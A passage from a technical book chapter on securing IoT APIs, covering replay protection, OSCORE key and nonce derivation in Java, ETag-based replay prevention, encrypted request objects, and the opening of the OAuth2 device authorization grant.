that the request is fresh and has not been replayed. The connection between
the two kinds of authentication can be summed up as: entity authentication =
message authentication + freshness.
In previous chapters, you’ve relied on TLS or authentication protocols such as OpenID
Connect (OIDC; see chapter 7) to ensure freshness, but end-to-end API requests need
to ensure this property for themselves. There are three general ways to ensure freshness:
API requests can include timestamps that indicate when the request was gener-
ated. The API server can then reject requests that are too old. This is the weak-
est form of replay protection because an attacker can still replay requests until
they expire. It also requires the client and server to have access to accurate
clocks that cannot be influenced by an attacker.
Requests can include a unique nonce (number-used-once). The server remem-
bers these nonces and rejects requests that attempt to reuse one that has
already been seen. To reduce the storage requirements on the server, this is
often combined with a timestamp, so that used nonces only have to be remem-
bered until the associated request expires. In some cases, you may be able to
use a monotonically increasing counter as the nonce, in which case the server only
needs to remember the highest value it has seen so far and reject requests that
use a smaller value. If multiple clients or servers share the same key, it can be
difficult to synchronize the counter between them all.
The most secure method is to use a challenge-response protocol shown in figure 13.3,
in which the server generates a random challenge value (a nonce) and sends it
to the client. The client then includes the challenge value in the API request,
proving that the request was generated after the challenge. Although more
secure, this adds overhead because the client must talk to the server to obtain a
challenge before they can send any requests.
DEFINITION
A monotonically increasing counter is one that only ever increases
and never goes backward and can be used as a nonce to prevent replay of API
requests. In a challenge-response protocol, the server generates a random chal-
lenge that the client includes in a subsequent request to ensure freshness.
Both TLS and OIDC employ challenge-response protocols for authentication. For
example, in OIDC the client includes a random nonce in the authentication request
498
CHAPTER 13
Securing IoT APIs
and the identity provider includes the same nonce in the generated ID token to
ensure freshness. However, in both cases the challenge is only used to ensure fresh-
ness of an initial authentication request and then other methods are used from then
on. In TLS, the challenge response happens during the handshake, and afterward a
monotonically increasing sequence number is added to every message. If either side
sees the sequence number go backward, then they abort the connection and a new
handshake (and new challenge response) needs to be performed. This relies on the
fact that TLS is a stateful protocol between a single client and a single server, but this
can’t generally be guaranteed for an end-to-end security protocol where each API
request may go to a different server.
Attacks from delaying, reordering, or blocking messages
Replay attacks are not the only way that an attacker may interfere with API requests
and responses. They may also be able to block or delay messages from being
received, which can cause security issues in some cases, beyond simple denial of
service. For example, suppose a legitimate client sends an authenticated “unlock”
request to a door-lock device. If the request includes a unique nonce or other mech-
anism described in this section, then an attacker won’t be able to replay the request
Device
API
Initial request
Challenge
Response
The client’s initial request is
rejected by the API, which sends
a random challenge to the client.
The client repeats its request including
a response to the challenge.
The API can be sure that the
client’s new request must be
more recent than the challenge,
ensuring freshness.
Figure 13.3
A challenge-response protocol ensures that an API request is
fresh and has not been replayed by an attacker. The client’s first API request
is rejected, and the API generates a random challenge value that it sends to
the client and stores locally. The client retries its request, including a response
to the challenge. The server can then be sure that the request has been freshly
generated by the genuine client and is not a replay attack.
499
End-to-end authentication
13.2.1 OSCORE
Object Security for Constrained RESTful Environments (OSCORE; https://tools.ietf
.org/html/rfc8613) is designed to be an end-to-end security protocol for API requests
in IoT environments. OSCORE is based on the use of pre-shared keys between the cli-
ent and server and makes use of CoAP (Constrained Application Protocol) and COSE
(CBOR Object Signing and Encryption) so that cryptographic algorithms and mes-
sage formats are suitable for constrained devices.
NOTE
OSCORE can be used either as an alternative to transport layer secu-
rity protocols such as DTLS or in addition to them. The two approaches are
complimentary, and the best security comes from combining both. OSCORE
doesn’t encrypt all parts of the messages being exchanged so TLS or DTLS
provides additional protection, while OSCORE ensures end-to-end security.
To use OSCORE, the client and server must maintain a collection of state, known as
the security context, for the duration of their interactions with each other. The secu-
rity context consists of three parts, shown in figure 13.4:
A Common Context, which describes the cryptographic algorithms to be used and
contains a Master Secret (the PSK) and an optional Master Salt. These are used
to derive keys and nonces used to encrypt and authenticate messages, such as
the Common IV, described later in this section.
A Sender Context, which contains a Sender ID, a Sender Key used to encrypt mes-
sages sent by this device, and a Sender Sequence Number. The sequence num-
ber is a nonce that starts at zero and is incremented every time the device sends
a message.
A Recipient Context, which contains a Recipient ID, a Recipient Key, and a Replay
Window, which is used to detect replay of received messages.
WARNING
Keys and nonces are derived deterministically in OSCORE, so if
the same security context is used more than once, then catastrophic nonce
reuse can occur. Devices must either reliably store the context state for the
later. However, they can prevent the original request being delivered immediately and
then send it to the device later, when the legitimate user has given up and walked
away. This is not a replay attack because the original request was never received by
the API; instead, the attacker has merely delayed the request and delivered it at a
later time than was intended. http://mng.bz/nzYK describes a variety of attacks
against CoAP that don’t directly violate the security properties of DTLS, TLS, or other
secure communication protocols. These examples illustrate the importance of good
threat modeling and carefully examining assumptions made in device communica-
tions. A variety of mitigations for CoAP are described in http://mng.bz/v9oM, includ-
ing a simple challenge-response “Echo” option that can be used to prevent delay
attacks, ensuring a stronger guarantee of freshness.
500
CHAPTER 13
Securing IoT APIs
life of the Master Key (including across device restarts) or else negotiate fresh
random parameters for each session.
DERIVING THE CONTEXT
The Sender ID and Recipient ID are short sequences of bytes and are typically only
allowed to be a few bytes long, so they can’t be globally unique names. Instead, they
Client
Server
Common context
Common context
Sender context
Sender context
Recipient context
Recipient context
The client and server begin with a shared
Master Key (PSK), Master Salt, and ID Context.
The Sender Context of the client
corresponds to the Recipient Context
on the server, and vice versa.
The server maintains a window of
recently used sequence numbers to
prevent replay of client requests.
Sender and recipient keys are
derived from the master keys
using HKDF key derivation.
Sequence #
Sender ID
Sender Key
Recipient ID
Recipient Key
Sequence #
Sender ID
Sender Key
Replay
Window
Recipient ID
Recipient Key
Common IV
ID Context
Master Key
Master Salt
Common IV
ID Context
Master Key
Master Salt
Figure 13.4
The OSCORE context is maintained by the client and server and consists of three
parts: a common context contains a Master Key, Master Salt, and Common IV component.
Sender and Recipient Contexts are derived from this common context and IDs for the sender
and recipient. The context on the server mirrors that on the client, and vice versa.
501
End-to-end authentication
are used to distinguish the two parties involved in the communication. For example,
some OSCORE implementations use a single 0 byte for the client, and a single 1 byte
for the server. An optional ID Context string can be included in the Common Con-
text, which can be used to map the Sender and Recipient IDs to device identities, for
example in a lookup table.
The Master Key and Master Salt are combined using the HKDF key derivation
function that you first used in chapter 11. Previously, you’ve only used the HKDF-
Expand function, but this combination is done using the HKDF-Extract method that
is intended for inputs that are not uniformly random. HKDF-Extract is shown in list-
ing 13.7 and is just a single application of HMAC using the Master Salt as the key and
the Master Key as the input. Open the HKDF.java file and add the extract method to
the existing code.
public static Key extract(byte[] salt, byte[] inputKeyMaterial)
throws GeneralSecurityException {
var hmac = Mac.getInstance("HmacSHA256");
if (salt == null) {
salt = new byte[hmac.getMacLength()];
}
hmac.init(new SecretKeySpec(salt, "HmacSHA256"));
return new SecretKeySpec(hmac.doFinal(inputKeyMaterial),
"HmacSHA256");
}
The HKDF key for OSCORE can then be calculated from the Master Key and Master
Salt as follows:
var hkdfKey = HKDF.extract(masterSalt, masterKey);
The sender and recipient keys are then derived from this master HKDF key using the
HKDF-Expand function from chapter 10, as shown in listing 13.8. A context argument
is generated as a CBOR array, containing the following items in order:
The Sender ID or Recipient ID, depending on which key is being derived.
The ID Context parameter, if specified, or a zero-length byte array otherwise.
The COSE algorithm identifier for the authenticated encryption algorithm
being used.
The string “Key” encoded as a CBOR binary string in ASCII.
The size of the key to be derived, in bytes.
This is then passed to the HKDF.expand() method to derive the key. Create a new file
named Oscore.java and copy the listing into it. You’ll need to add the following
imports at the top of the file:
Listing 13.7
HKDF-Extract
HKDF-Extract takes a random salt
value and the input key material.
If a salt is not
provided, then an
all-zero salt is used.
The result is the output of HMAC using the salt
as the key and the key material as the input.
502
CHAPTER 13
Securing IoT APIs
import COSE.*;
import com.upokecenter.cbor.CBORObject;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import java.nio.*;
import java.security.*;
private static Key deriveKey(Key hkdfKey, byte[] id,
byte[] idContext, AlgorithmID coseAlgorithm)
throws GeneralSecurityException {
int keySizeBytes = coseAlgorithm.getKeySize() / 8;
CBORObject context = CBORObject.NewArray();
context.Add(id);
context.Add(idContext);
context.Add(coseAlgorithm.AsCBOR());
context.Add(CBORObject.FromObject("Key"));
context.Add(keySizeBytes);
return HKDF.expand(hkdfKey, context.EncodeToBytes(),
keySizeBytes, "AES");
}
The Common IV is derived in almost the same way as the sender and recipient keys, as
shown in listing 13.9. The label “IV” is used instead of “Key,” and the length of the IV
or nonce used by the COSE authenticated encryption algorithm is used instead of the
key size. For example, the default algorithm is AES_CCM_16_64_128, which requires
a 13-byte nonce, so you would pass 13 as the ivLength argument. Because our HKDF
implementation returns a Key object, you can use the getEncoded() method to con-
vert that into the raw bytes needed for the Common IV. Add this method to the
Oscore class you just created.
private static byte[] deriveCommonIV(Key hkdfKey,
byte[] idContext, AlgorithmID coseAlgorithm, int ivLength)
throws GeneralSecurityException {
CBORObject context = CBORObject.NewArray();
context.Add(new byte[0]);
context.Add(idContext);
context.Add(coseAlgorithm.AsCBOR());
context.Add(CBORObject.FromObject("IV"));
context.Add(ivLength);
return HKDF.expand(hkdfKey, context.EncodeToBytes(),
ivLength, "dummy").getEncoded();
}
Listing 13.10 shows an example of deriving the sender and recipient keys and
Common IV based on the test case from appendix C of the OSCORE specification
Listing 13.8
Deriving the sender and recipient keys
Listing 13.9
Deriving the Common IV
The context is a CBOR
array containing the ID,
ID context, algorithm
identifier, and key size.
HKDF-Expand is used
to derive the key
from the master
HKDF key.
Use the label "IV"
and the length of
the required nonce
in bytes.
Use HKDF-Expand
but return the raw
bytes rather than
a Key object.
503
End-to-end authentication
(https://tools.ietf.org/html/rfc8613#appendix-C.1.1). You can run the code to verify
that you get the same answers as the RFC. You can use org.apache.commons.codec
.binary.Hex to print the keys and IV in hexadecimal to check the test outputs.
WARNING
Don’t use this master key and master salt in a real application!
Fresh keys should be generated for each device.
public static void main(String... args) throws Exception {
var algorithm = AlgorithmID.AES_CCM_16_64_128;
var masterKey = new byte[] {
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10
};
var masterSalt = new byte[] {
(byte) 0x9e, 0x7c, (byte) 0xa9, 0x22, 0x23, 0x78,
0x63, 0x40
};
var hkdfKey = HKDF.extract(masterSalt, masterKey);
var senderId = new byte[0];
var recipientId = new byte[] { 0x01 };
var senderKey = deriveKey(hkdfKey, senderId, null, algorithm);
var recipientKey = deriveKey(hkdfKey, recipientId, null, algorithm);
var commonIv = deriveCommonIV(hkdfKey, null, algorithm, 13);
}
GENERATING NONCES
The Common IV is not used directly to encrypt data because it is a fixed value, so would
immediately result in nonce reuse vulnerabilities. Instead the nonce is derived from a
combination of the Common IV, the sequence number (called the Partial IV), and the
ID of the sender, as shown in listing 13.11. First the sequence number is checked to make
sure it fits in 5 bytes, and the Sender ID is checked to ensure it will fit in the remainder of
the IV. This puts significant constraints on the maximum size of the Sender ID. A packed
binary array is generated consisting of the following items, in order:
The length of the Sender ID as a single byte
The sender ID itself, left-padded with zero bytes until it is 6 bytes less than the
total IV length
The sequence number encoded as a 5-byte big-endian integer
The resulting array is then combined with the Common IV using bitwise XOR, using
the following method:
private static byte[] xor(byte[] xs, byte[] ys) {
for (int i = 0; i < xs.length; ++i)
xs[i] ^= ys[i];
return xs;
}
Listing 13.10
Deriving OSCORE keys and IV
The default algorithm
used by OSCORE
The Master Key
and Master Salt
from the OSCORE
test case
Derive
the HKDF
master key.
The Sender ID is an
empty byte array,
and the Recipient ID
is a single 1 byte.
Derive the keys and Common IV.
XOR each element of the
second array (ys) into the
corresponding element of
the first array (xs).
Return the
updated result.
504
CHAPTER 13
Securing IoT APIs
Add the xor() method and the nonce() method from listing 13.11 to the Oscore class.
NOTE
Although the generated nonce looks random due to being XORed
with the Common IV, it is in fact a deterministic counter that changes pre-
dictably as the sequence number increases. The encoding is designed to
reduce the risk of accidental nonce reuse.
private static byte[] nonce(int ivLength, long sequenceNumber,
byte[] id, byte[] commonIv) {
if (sequenceNumber > (1L << 40))
throw new IllegalArgumentException(
"Sequence number too large");
int idLen = ivLength - 6;
if (id.length > idLen)
throw new IllegalArgumentException("ID is too large");
var buffer = ByteBuffer.allocate(ivLength).order(ByteOrder.BIG_ENDIAN);
buffer.put((byte) id.length);
buffer.put(new byte[idLen - id.length]);
buffer.put(id);
buffer.put((byte) ((sequenceNumber >>> 32) & 0xFF));
buffer.putInt((int) sequenceNumber);
return xor(buffer.array(), commonIv);
}
ENCRYPTING A MESSAGE
Once you’ve derived the per-message nonce, you can encrypt an OSCORE message, as
shown in listing 13.12, which is based on the example in section C.4 of the OSCORE
specification. OSCORE messages are encoded as COSE_Encrypt0 structures, in which
there is no explicit recipient information. The Partial IV and the Sender ID are
encoded into the message as unprotected headers, with the Sender ID using the stan-
dard COSE Key ID (KID) header. Although marked as unprotected, those values are
actually authenticated because OSCORE requires them to be included in a COSE
external additional authenticated data structure, which is a CBOR array with the follow-
ing elements:
An OSCORE version number, currently always set to 1
The COSE algorithm identifier
The Sender ID
The Partial IV
An options string. This is used to encode CoAP headers but is blank in this
example.
The COSE structure is then encrypted with the sender key.
DEFINITION
COSE allows messages to have external additional authenticated data,
which are included in the message authentication code (MAC) calculation but
Listing 13.11
Deriving the per-message nonce
Check the sequence
number is not too large.
Check the Sender
ID fits in the
remaining space.
Encode the Sender ID
length followed by the
Sender ID left-padded to
6 less than the IV length.
Encode the
sequence
number
as a 5-byte
big-endian
integer.
XOR the result with the Common
IV to derive the final nonce.
505
End-to-end authentication
not sent as part of the message itself. The recipient must be able to inde-
pendently recreate this external data otherwise decryption will fail.
long sequenceNumber = 20L;
byte[] nonce = nonce(13, sequenceNumber, senderId, commonIv);
byte[] partialIv = new byte[] { (byte) sequenceNumber };
var message = new Encrypt0Message();
message.addAttribute(HeaderKeys.Algorithm,
algorithm.AsCBOR(), Attribute.DO_NOT_SEND);
message.addAttribute(HeaderKeys.IV,
nonce, Attribute.DO_NOT_SEND);
message.addAttribute(HeaderKeys.PARTIAL_IV,
partialIv, Attribute.UNPROTECTED);
message.addAttribute(HeaderKeys.KID,
senderId, Attribute.UNPROTECTED);
message.SetContent(
new byte[] { 0x01, (byte) 0xb3, 0x74, 0x76, 0x31});
var associatedData = CBORObject.NewArray();
associatedData.Add(1);
associatedData.Add(algorithm.AsCBOR());
associatedData.Add(senderId);
associatedData.Add(partialIv);
associatedData.Add(new byte[0]);
message.setExternal(associatedData.EncodeToBytes());
Security.addProvider(new BouncyCastleProvider());
message.encrypt(senderKey.getEncoded());
The encrypted message is then encoded into the application protocol, such as CoAP
or HTTP and sent to the recipient. Details of this encoding are given in section 6 of
the OSCORE specification. The recipient can recreate the nonce from its own recip-
ient security context, together with the Partial IV and Sender ID encoded into the
message.
The recipient is responsible for checking that the Partial IV has not been seen
before to prevent replay attacks. When OSCORE is transmitted over a reliable proto-
col such as HTTP, this can be achieved by keeping track of the last Partial IV received
and ensuring that any new messages always use a larger number. For unreliable proto-
cols such as CoAP over UDP, where messages may arrive out of order, you can use the
algorithm from RFC 4303 (http://mng.bz/4BjV). This approach maintains a window
of allowed sequence numbers between a minimum and maximum value that the
recipient will accept and explicitly records which values in that range have been
received. If the recipient is a cluster of servers, such as a typical cloud-hosted API, then
this state must be synchronized between all servers to prevent replay attacks. Alterna-
tively, sticky load balancing can be used to ensure requests from the same device are
always delivered to the same server instance, shown in figure 13.5, but this can be
Listing 13.12
Encrypting the plaintext
Generate the
nonce and
encode the
Partial IV.
Configure the
algorithm
and nonce.
Set the Partial IV
and Sender ID as
unprotected headers.
Set the
content
field to the
plaintext to
encrypt.
Encode the external
associated data.
Ensure Bouncy Castle is
loaded for AES-CCM support,
then encrypt the message.
506
CHAPTER 13
Securing IoT APIs
problematic in environments where servers are frequently added or removed. Sec-
tion 13.1.5 discusses an alternative approach to preventing replay attacks that can be
effective to REST APIs.
DEFINITION
Sticky load balancing is a setting supported by most load balancers
that ensures that API requests from a device or client are always delivered to
the same server instance. Although this can help with stateful connections, it
can harm scalability and is generally discouraged.
13.2.2 Avoiding replay in REST APIs
All solutions to message replay involve the client and server maintaining some state.
However, in some cases you can avoid the need for per-client state to prevent replay.
For example, requests that only read data are harmless if replayed, so long as they do
not require significant processing on the server and the responses are kept confiden-
tial. Some requests that perform operations are also harmless to replay if the request
is idempotent.
DEFINITION
An operation is idempotent if performing it multiple times has the
same effect as performing it just once. Idempotent operations are important
for reliability because if a request fails because of a network error, the client
can safely retry it.
Device 1
Device 2
Device 3
Device 4
Load balancer
Server 1
Server 2
Server 3
In normal load balancing, each request
from a device can be sent to any server,
providing best use of resources.
With sticky load balancing, all
requests from the same device
always go to the same server.
Figure 13.5
In sticky load balancing, all requests from one
device are always handled by the same server. This simplifies
state management but reduces scalability and can cause
problems if that server restarts or is removed from the cluster.
507
End-to-end authentication
The HTTP specification requires the read-only methods GET, HEAD, and OPTIONS,
along with PUT and DELETE requests, to all be idempotent. Only the POST and
PATCH methods are not generally idempotent.
WARNING
Even if you stick to PUT requests instead of POST, this doesn’t
mean that your requests are always safe from replay.
The problem is that the definition of idempotency says nothing about what happens if
another request occurs in between the original request and the replay. For example,
suppose you send a PUT request updating a page on a website, but you lose your net-
work connection and do not know if the request succeeded or not. Because the
request is idempotent, you send it again. Unknown to you, one of your colleagues in
the meantime sent a DELETE request because the document contained sensitive
information that shouldn’t have been published. Your replayed PUT request arrives
afterwards, and the document is resurrected, sensitive data and all. An attacker can
replay requests to restore an old version of a resource, even though all the operations
were individually idempotent.
Thankfully, there are several mechanisms you can use to ensure that no other
request has occurred in the meantime. Many updates to a resource follow the pattern
of first reading the current version and then sending an updated version. You can
ensure that nobody has changed the resource since you read it using one of two stan-
dard HTTP mechanisms:
The server can return a Last-Modified header when reading a resource that
indicates the date and time when it was last modified. The client can then send
an If-Unmodified-Since header in its update request with the same timestamp.
If the resource has changed in the meantime, then the request will be rejected
with a 412 Precondition Failed status.2 The main downside of Last-Modified
headers is that they are limited to the nearest second, so are unable to detect
changes occurring more frequently.
Alternatively, the server can return an ETag (Entity Tag) header that should
change whenever the resource changes as shown in figure 13.6. Typically, the
ETag is either a version number or a cryptographic hash of the contents of
the resource. The client can then send an If-Matches header containing the
expected ETag when it performs an update. If the resource has changed in
the meantime, then the ETag will be different and the server will respond
with a 412 status-code and reject the request.
WARNING
Although a cryptographic hash can be appealing as an ETag, it
does mean that the ETag will revert to a previous value if the content does.
This allows an attacker to replay any old requests with a matching ETag. You
2 If the server can determine that the current state of the resource happens to match the requested state, then
it can also return a success status code as if the request succeeded in this case. But in this case the request is
really idempotent anyway.
508
CHAPTER 13
Securing IoT APIs
can prevent this by including a counter or timestamp in the ETag calculation
so that the ETag is always different even if the content is the same.
Listing 13.13 shows an example of updating a resource using a simple monotonic
counter as the ETag. In this case, you can use an AtomicInteger class to hold the cur-
rent ETag value, using the atomic compareAndSet method to increment the value if
the If-Matches header in the request matches the current value. Alternatively, you can
store the ETag values for resources in the database alongside the data for a resource
and update them in a transaction. If the If-Matches header in the request doesn’t
match the current value, then a 412 Precondition Failed header is returned; otherwise,
the resource is updated and a new ETag is returned.
Client
API
GET/resource/xyz
Response, ETag: abc123
PUT/resource/xyz
If-Matches: abc123
Attacker
Captures request
object
PUT/resource/xyz
If-Matches: abc123
412 Precondition Failed
The client sends a request including the
expected ETag in the If-Matches header.
When the attacker tries to replay
the captured request, it fails because
the ETag no longer matches.
Figure 13.6
A client can prevent replay of authenticated request
objects by including an If-Matches header with the expected ETag of
the resource. The update will modify the resource and cause the ETag
to change, so if an attacker tries to replay the request, it will fail with
a 412 Precondition Failed error.
509
End-to-end authentication
var etag = new AtomicInteger(42);
put("/test", (request, response) -> {
var expectedEtag = parseInt(request.headers("If-Matches"));
if (!etag.compareAndSet(expectedEtag, expectedEtag + 1)) {
response.status(412);
return null;
}
System.out.println("Updating resource with new content: " +
request.body());
response.status(200);
response.header("ETag", String.valueOf(expectedEtag + 1));
response.type("text/plain");
return "OK";
});
The ETag mechanism can also be used to prevent replay of a PUT request that is
intended to create a resource that doesn’t yet exist. Because the resource doesn’t
exist, there is no existing ETag or Last-Modified date to include. An attacker could
replay this message to overwrite a later version of the resource with the original con-
tent. To prevent this, you can include an If-None-Match header with the special
value *, which tells the server to reject the request if there is any existing version of
this resource at all.
TIP
The Constrained Application Protocol (CoAP), often used for implementing
REST APIs in constrained environments, doesn’t support the Last-Modified
or If-Unmodified-Since headers, but it does support ETags along with If-
Matches and If-None-Match. In CoAP, headers are known as options.
ENCODING HEADERS WITH END-TO-END SECURITY
As explained in chapter 12, in an end-to-end IoT application, a device may not be able
to directly talk to the API in HTTP (or CoAP) but must instead pass an authenticated
message through multiple intermediate proxies. Even if each proxy supports HTTP,
the client may not trust those proxies not to interfere with the message if there isn’t
an end-to-end TLS connection. The solution is to encode the HTTP headers along
with the request data into an encrypted request object, as shown in listing 13.14.
DEFINITION
A request object is an API request that is encapsulated as a single
data object that can be encrypted and authenticated as one element. The
request object captures the data in the request as well as headers and other
metadata required by the request.
In this example, the headers are encoded as a CBOR map, which is then combined
with the request body and an indication of the expected HTTP method to create the
overall request object. The entire object is then encrypted and authenticated using
Listing 13.13
Using ETags to prevent replay
Check the
current ETag
matches the
one in the
request.
If not,
return a 412
Precondition
Failed
response.
Otherwise,
return the
new ETag after
updating the
resource.
510
CHAPTER 13
Securing IoT APIs
NaCl’s CryptoBox functionality. OSCORE, discussed in section 13.1.4, is an example
of an end-to-end protocol using request objects. The request objects in OSCORE are
CoAP messages encrypted with COSE.
TIP
Full source code for this example is provided in the GitHub repository
accompanying the book at http://mng.bz/QxWj.
var revisionEtag = "42";
var headers = CBORObject.NewMap()
.Add("If-Matches", revisionEtag);
var body = CBORObject.NewMap()
.Add("foo", "bar")
.Add("data", 12345);
var request = CBORObject.NewMap()
.Add("method", "PUT")
.Add("headers", headers)
.Add("body", body);
var sent = CryptoBox.encrypt(clientKeys.getPrivate(),
serverKeys.getPublic(), request.EncodeToBytes());
To validate the request, the API server should decrypt the request object and then ver-
ify that the headers and HTTP request method match those specified in the object. If
they don’t match, then the request should be rejected as invalid.
CAUTION
You should always ensure the actual HTTP request headers match the
request object rather than replacing them. Otherwise, an attacker can use the
request object to bypass security filtering performed by Web Application Fire-
walls and other security controls. You should never let a request object change
the HTTP method because many security checks in web browsers rely on it.
Listing 13.15 shows how to validate a request object in a filter for the Spark HTTP
framework you’ve used in earlier chapters. The request object is decrypted using NaCl.
Because this is authenticated encryption, the decryption process will fail if the request
has been faked or tampered with. You should then verify that the HTTP method of the
request matches the method included in the request object, and that any headers listed
in the request object are present with the expected values. If any details don’t match,
then you should reject the request with an appropriate error code and message. Finally,
if all checks pass, then you can store the decrypted request body in an attribute so that it
can easily be retrieved without having to decrypt the message again.
before((request, response) -> {
var encryptedRequest = CryptoBox.fromString(request.body());
var decrypted = encryptedRequest.decrypt(
serverKeys.getPrivate(), clientKeys.getPublic());
var cbor = CBORObject.DecodeFromBytes(decrypted);
Listing 13.14
Encoding HTTP headers into a request object
Listing 13.15
Validating a request object
Encode any
required HTTP
headers into CBOR.
Encode the headers
and body, along with
the HTTP method, as
a single object.
Encrypt and
authenticate
the entire
request object.
Decrypt the
request object
and decode it.
511
OAuth2 for constrained environments
if (!cbor.get("method").AsString()
.equals(request.requestMethod())) {
halt(403);
}
var expectedHeaders = cbor.get("headers");
for (var headerName : expectedHeaders.getKeys()) {
if (!expectedHeaders.get(headerName).AsString()
.equals(request.headers(headerName.AsString()))) {
halt(403);
}
}
request.attribute("decryptedRequest", cbor.get("body"));
});
13.3
OAuth2 for constrained environments
Throughout this book, OAuth2 has cropped up repeatedly as a common approach to
securing APIs in many different environments. What started as a way to do delegated
authorization in traditional web applications has expanded to encompass mobile
Pop quiz
3
Entity authentication requires which additional property on top of message
authentication?
a
Fuzziness
b
Friskiness
c
Funkiness
d
Freshness
4
Which of the following are ways of ensuring authentication freshness? (There are
multiple correct answers.)
a
Deodorant
b
Timestamps
c
Unique nonces
d
Challenge-response protocols
e
Message authentication codes
5
Which HTTP header is used to ensure that the ETag of a resource matches an
expected value?
a
If-Matches
b
Cache-Control
c
If-None-Matches
d
If-Unmodified-Since
The answers are at the end of the chapter.
Check that the HTTP
method matches the
request object.
Check that any
headers in the
request object
have their
expected
values.
If all checks
pass, then store
the decrypted
request body.
512
CHAPTER 13
Securing IoT APIs
apps, service-to-service APIs, and microservices. It should therefore come as little sur-
prise that it is also being applied to securing APIs in the IoT. It’s especially suited to
consumer IoT applications in the home. For example, a smart TV may allow users to log
in to streaming services to watch films or listen to music, or to view updates from
social media streams. These are well-suited to OAuth2, because they involve a human
delegating part of their authority to a device for a well-defined purpose.
DEFINITION
A smart TV (or connected TV) is a television that is capable of
accessing services over the internet, such as music or video streaming or social
media APIs. Many other home entertainment devices are also now capable of
accessing the internet and APIs are powering this transformation.
But the traditional approaches to obtain authorization can be difficult to use in an
IoT environment for several reasons:
The device may lack a screen, keyboard, or other capabilities needed to let a
user interact with the authorization server to approve consent. Even on a more
capable device such as a smart TV, typing in long usernames or passwords on a
small remote control can be time-consuming and annoying for users. Section
13.2.1 discusses the device authorization grant that aims to solve this problem.
Token formats and security mechanisms used by authorization servers are often
heavily focused on web browser clients or mobile apps and are not suitable for
more constrained devices. The ACE-OAuth framework discussed in section
13.2.2 is an attempt to adapt OAuth2 for such constrained environments.
DEFINITION
ACE-OAuth (Authorization for Constrained Environments using
OAuth2) is a framework specification that adapts OAuth2 for constrained
devices.
13.3.1 The device authorization grant
The OAuth2 device authorization grant (RFC 8628, https://tools.ietf.org/html/rfc8628)
allows devices that lack normal input and output capabilities to obtain access tokens
from users. In the normal OAuth2 flows discussed in chapter 7, the OAuth2 client
would redirect the user to a web page on the authorization server (AS), where they
can log in and approve access. This is not possible on many IoT devices because they
have no display to show a web browser, and no keyboard, mouse, or touchscreen to let
the user enter their details. The device authorization grant, or device flow as it is often
called, solves this problem by letting the user complete the authorization on a second
device, such as a laptop or mobile phone. Figure 13.7 shows the overall flow, which is
described in more detail in the rest of this section.
To initiate the flow, the device first makes a POST request to a new device authoriza-
tion endpoint at the AS, indicating the scope of the access token it requires and authen-
ticating using its client credentials. The AS returns three details in the response:
513
OAuth2 for constrained environments
A device code, which is a bit like an authorization code from chapter 7 and will
eventually be exchanged for an access token after the user authorizes the
request. This is typically an unguessable random string.
A user code, which is a shorter code designed to be manually entered by the user
when they approve the authorization request.
A verification URI where the user should go to type in the user code to approve
the request. This will typically be a short URI if the user will have to manually
type it in on another device.
Listing 13.16 shows how to begin a device grant authorization request from Java. In this
example, the device is a public client and so you only need to supply the client_id and
Loop
Device
Authorization
server
User
Smartphone
Starts device grant
Device code, user
code, verification
URI
The client starts the device
grant, including its client ID
and requested scope.
Asks user to visit verification URI
and type in user code
Visits verification URI
Checks status
Keeps trying
Fetches verification URI
Authenticates user
Types in user code
Checks status
Accesses token
The client uses the
device code to poll the
token endpoint until
the flow completes.
The user visits the
verification URI on
another device and
types in the user
code to approve the
authorization grant.
Figure 13.7
In the OAuth2 device authorization grant, the device first calls an endpoint on
the AS to start the flow and receives a device code and short user code. The device asks
the user to navigate to the AS on a separate device, such as a smartphone. After the user
authenticates, they type in the user code and approve the request. The device polls the AS
in the background using the device code until the flow completes. If the user approved the
request, then the device receives an access token the next time it polls the AS.
514
CHAPTER 13
Securing IoT APIs
scope parameters on the request. If your device is a confidential client, then you
would also need to supply client credentials using HTTP Basic authentication or
another client authentication method supported by your AS. The parameters are
URL-encoded as they are for other OAuth2 requests. The AS returns a 200 OK
response if the request is successful, with the device code, user code, and verification
URI in JSON format. Navigate to src/main/java/com/manning/apisecurityinaction
and create a new file named DeviceGrantClient.java. Create a new public class in the
file with the same name and add the method from listing 13.16 to the file. You’ll need
the following imports at the top of the file:
import org.json.JSONObject;
import java.net.*;
import java.net.http.*;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import java.util.concurrent.TimeUnit;
import static java.nio.charset.StandardCharsets.UTF_8;
private static final HttpClient httpClient = HttpClient.newHttpClient();
private static JSONObject beginDeviceAuthorization(
String clientId, String scope) throws Exception {
var form = "client_id=" + URLEncoder.encode(clientId, UTF_8) +
"&scope=" + URLEncoder.encode(scope, UTF_8);
var request = HttpRequest.newBuilder()
.header("Content-Type",
"application/x-www-form-urlencoded")
.uri(URI.create(
"https://as.example.com/device_authorization"))
.POST(BodyPublishers.ofString(form))
.build();
var response = httpClient.send(request, BodyHandlers.ofString());
if (response.statusCode() != 200) {
throw new RuntimeException("Bad response from AS: " +
response.body());
}
return new JSONObject(response.body());
}
The device that initiated the flow communicates the verification URI and user code to
the user but keeps the device code secret. For example, the device might be able to dis-
play a QR code (figure 13.8) that the user can scan on their phone to open the verifi-
cation URI, or the device might communicate directly with the user’s phone over a
local Bluetooth connection. To approve the authorization, the user opens the verifica-
tion URI on their other device and logs in. They then type in the user code and can
either approve or deny the request after seeing details of the scopes requested.
Listing 13.16
Starting a device authorization grant flow
Encode the
client ID and
scope as form
parameters
and POST
them to the
device
endpoint.
If the response
is not 200 OK,
then an error
occurred.
Otherwise, parse the
response as JSON.
515
OAuth2 for constrained environments
TIP
The AS may also return a verification_uri_complete field that com-
bines the verification URI with the user code. This allows the user to just fol-
low the link without needing to manually type in the code.
The original device that requested authorization is not notified that the flow has com-
pleted. Instead, it must periodically poll the access token endpoint at the AS, passing
in the device code it received in the initial request as shown in listing 13.17. This is the
same access token endpoint used in the other OAuth2 grant types discussed in chap-
ter 7, but you set the grant_type parameter to
urn:ietf:params:oauth:grant-type:device_code
to indicate that the device authorization grant is being used. The client also includes
its client ID and the device code itself. If the client is confidential, it must also authen-
ticate using its client credentials, but this example is using a public client. Open the
DeviceGrantClient.java file again and add the method from the following listing.
private static JSONObject pollAccessTokenEndpoint(
String clientId, String deviceCode) throws Exception {
var form = "client_id=" + URLEncoder.encode(clientId, UTF_8) +
